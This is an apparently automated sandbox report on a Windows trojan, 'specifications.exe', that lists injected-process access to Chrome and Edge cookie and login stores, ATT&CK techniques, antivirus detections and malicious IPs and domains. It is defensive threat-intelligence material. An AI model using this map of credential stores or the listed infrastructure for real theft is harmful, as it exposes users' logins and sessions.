                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                      Remote Access Functionality

                      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                      Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 11 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 22 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                      Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                      IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                      [Behavior graph: ID 1565081, Sample: specifications.exe, Startdate: 29/11/2024, Architecture: WINDOWS, Score: 100]

                      Source | Detection | Scanner | Label | Link
                      specifications.exe | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Swotter |
                      specifications.exe | 100% | Avira | HEUR/AGEN.1305452 |
                      specifications.exe | 100% | Joe Sandbox ML | |
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      Source | Detection | Scanner | Label | Link
                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      Name | Malicious | Antivirus Detection | Reputation
                      Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.fontbureau.com/designersspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.goodfont.co.krspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.Cortisalincontrol.netSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://www.cortisalincontrol.net/__media__/js/trademark.php?d=cortisalincontrol.net&type=nsSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.canadavinreport.site/4d2l/?JZOtU=ZGBp9LUVeZbORokkig5UphI/KSearchProtocolHost.exe, 00000007.00000002.4146192735.00000000039A8000.00000004.10000000.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003298000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://www.sajatypeworks.comspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.typography.netDspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.founder.com.cn/cn/cThespecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.galapagosdesign.com/staff/dennis.htmspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSearchProtocolHost.exe, 00000007.00000002.4147851493.0000000007678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.galapagosdesign.com/DPleasespecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://i1.cdn-image.com/__media__/pics/28903/search.png)SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.fonts.comspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.sandoll.co.krspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.urwpp.deDPleasespecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.zhongyicts.com.cnspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.sakkal.comspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://delivery.consentmanager.netSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://www.strato.deneghZqrDWkxUmu.exe, 00000008.00000002.4145670077.00000000040BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://www.apache.org/licenses/LICENSE-2.0specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.fontbureau.comspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.litespeedtech.com/error-pageSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004314000.00000004.10000000.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003C04000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SearchProtocolHost.exe, 00000007.00000002.4147851493.0000000007678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://www.conseilnsaftogo.orgneghZqrDWkxUmu.exe, 00000008.00000002.4147180609.0000000005081000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://www.ecosia.org/newtab/SearchProtocolHost.exe, 00000007.00000002.4147851493.0000000007678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://www.carterandcone.comlspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://ac.ecosia.org/autocomplete?q=SearchProtocolHost.exe, 00000007.00000002.4147851493.0000000007678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://www.fontbureau.com/designers/cabarga.htmlNspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://www.founder.com.cn/cnspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://www.fontbureau.com/designers/frere-user.htmlspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://www.ascendercorp.com/typedesigners.htmlmspecifications.exe, 00000000.00000002.1744315921.0000000008770000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://www.jiyu-kobo.co.jp/specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://www.cortisalincontrol.net/display.cfmSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        http://www.fontbureau.com/designers8specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=SearchProtocolHost.exe, 00000007.00000002.4147851493.0000000007678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://i1.cdn-image.com/__media__/js/min.js?v2.3SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
217.160.0.200 | carsten.studio | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
209.74.77.107 | www.gadgetre.info | United States | 31744 | MULTIBAND-NEWHOPEUS | true
23.225.159.42 | r0lqcud7.nbnnn.xyz | United States | 40065 | CNSERVERSUS | true
154.70.82.246 | conseilnsaftogo.org | Togo | 30982 | CAFENETTG | true
156.232.181.155 | www.5tuohbpzyj9.buzz | Seychelles | 134548 | DXTL-HKDXTLTseungKwanOServiceHK | true
                                                                                                                                                                                103.75.185.22
                                                                                                                                                                                taxitayninh365.siteViet Nam
                                                                                                                                                                                63762VNBOOKING-AS-VNVietNamBookingcorporationVNtrue
                                                                                                                                                                                155.94.253.4
                                                                                                                                                                                rtpmesinkoin.clickUnited States
                                                                                                                                                                                8100ASN-QUADRANET-GLOBALUStrue
                                                                                                                                                                                208.91.197.27
                                                                                                                                                                                www.cortisalincontrol.netVirgin Islands (BRITISH)
                                                                                                                                                                                40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                                                                                185.27.134.206
                                                                                                                                                                                www.canadavinreport.siteUnited Kingdom
                                                                                                                                                                                34119WILDCARD-ASWildcardUKLimitedGBfalse
                                                                                                                                                                                104.21.90.137
                                                                                                                                                                                www.ana-silverco.shopUnited States
                                                                                                                                                                                13335CLOUDFLARENETUStrue
                                                                                                                                                                                176.32.38.130
                                                                                                                                                                                www.acc888ommodate.xyzRussian Federation
                                                                                                                                                                                51659ASBAXETRUtrue
                                                                                                                                                                                161.97.168.245
                                                                                                                                                                                www.nb-shenshi.buzzUnited States
                                                                                                                                                                                51167CONTABODEfalse
                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                Analysis ID:1565081
                                                                                                                                                                                Start date and time:2024-11-29 09:14:09 +01:00
                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                Overall analysis duration:0h 10m 20s
                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                Report type:full
                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                Number of analysed new started processes analysed:9
                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                Number of injected processes analysed:2
                                                                                                                                                                                Technologies:
                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                Sample name:specifications.exe
                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@7/2@19/12
                                                                                                                                                                                EGA Information:
                                                                                                                                                                                • Successful, ratio: 80%
                                                                                                                                                                                HCA Information:
                                                                                                                                                                                • Successful, ratio: 95%
                                                                                                                                                                                • Number of executed functions: 119
                                                                                                                                                                                • Number of non-executed functions: 299
                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                • Execution Graph export aborted for target neghZqrDWkxUmu.exe, PID 5572 because it is empty
                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                • VT rate limit hit for: specifications.exe
Time | Type | Description
03:15:03 | API Interceptor | 2x Sleep call for process: specifications.exe modified
03:16:13 | API Interceptor | 9845711x Sleep call for process: SearchProtocolHost.exe modified
                                                                                                                                                                                splarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 104.192.5.161
                                                                                                                                                                                https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://digitalplatform-admin-p.azurewebsites.net/external-link/?targetURL=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25SERIAL%2525wDnNeW8yycT&sa=t&esrc=nNeW8F%25SERIAL%2525A0xys8Em2FL&source=&cd=tS6T8%25SERIAL%2525Tiw9XH&cad=XpPkDfJX%25SERIAL%2525VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/www.monument-funerar.ro/admin/view/image/payment/#test@example.deGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                • 217.160.0.248
                                                                                                                                                                                Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 217.160.0.113
                                                                                                                                                                                FACTURA 24V70 VINS.exeGet hashmaliciousFormBookBrowse
